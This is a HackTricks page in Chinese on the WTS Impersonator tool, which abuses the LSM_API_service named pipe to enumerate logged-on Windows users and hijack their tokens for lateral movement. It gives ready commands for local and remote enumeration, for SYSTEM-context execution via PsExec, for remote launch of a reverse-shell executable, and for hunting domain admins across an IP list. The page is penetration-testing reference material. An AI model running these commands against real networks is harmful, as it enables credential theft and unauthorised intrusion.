hacktricks/windows-hardening/stealing-credentials/wts-impersonator.md

从零开始学习AWS黑客技术，成为专家 htARTE（HackTricks AWS红队专家）！

支持HackTricks的其他方式：

• 如果您想看到您的公司在HackTricks中做广告或下载PDF格式的HackTricks，请查看订阅计划!
• 获取官方PEASS & HackTricks周边产品
• 探索PEASS家族，我们独家的NFTs
• 加入 💬 Discord群 或 电报群 或 关注我们的Twitter 🐦 @carlospolopm。
• 通过向HackTricks和HackTricks Cloud github仓库提交PR来分享您的黑客技巧。

WTS Impersonator工具利用**"\pipe\LSM_API_service"** RPC命名管道，隐蔽地枚举已登录用户并劫持其令牌，绕过传统的令牌模拟技术。这种方法有助于在网络中实现无缝的横向移动。这项技术背后的创新归功于**Omri Baso，其作品可在GitHub**上找到。

核心功能

该工具通过一系列API调用运行：

WTSEnumerateSessionsA → WTSQuerySessionInformationA → WTSQueryUserToken → CreateProcessAsUserW

关键模块和用法

• 枚举用户：使用该工具可以进行本地和远程用户枚举，使用以下命令执行相应场景：
• 本地：

.\WTSImpersonator.exe -m enum

• 远程，通过指定IP地址或主机名：

.\WTSImpersonator.exe -m enum -s 192.168.40.131

• 执行命令：exec 和 exec-remote 模块需要服务上下文才能运行。本地执行只需 WTSImpersonator 可执行文件和一个命令：
• 本地命令执行示例：

.\WTSImpersonator.exe -m exec -s 3 -c C:\Windows\System32\cmd.exe

• 可使用 PsExec64.exe 获取服务上下文：

.\PsExec64.exe -accepteula -s cmd.exe

• 远程命令执行：涉及远程创建和安装类似于 PsExec.exe 的服务，允许以适当权限执行。
• 远程执行示例：

.\WTSImpersonator.exe -m exec-remote -s 192.168.40.129 -c .\SimpleReverseShellExample.exe -sp .\WTSService.exe -id 2

• 用户搜索模块：针对多台机器上的特定用户，以其凭据执行代码。这对于针对在多个系统上具有本地管理员权限的域管理员非常有用。
• 用法示例：

.\WTSImpersonator.exe -m user-hunter -uh DOMAIN/USER -ipl .\IPsList.txt -c .\ExeToExecute.exe -sp .\WTServiceBinary.exe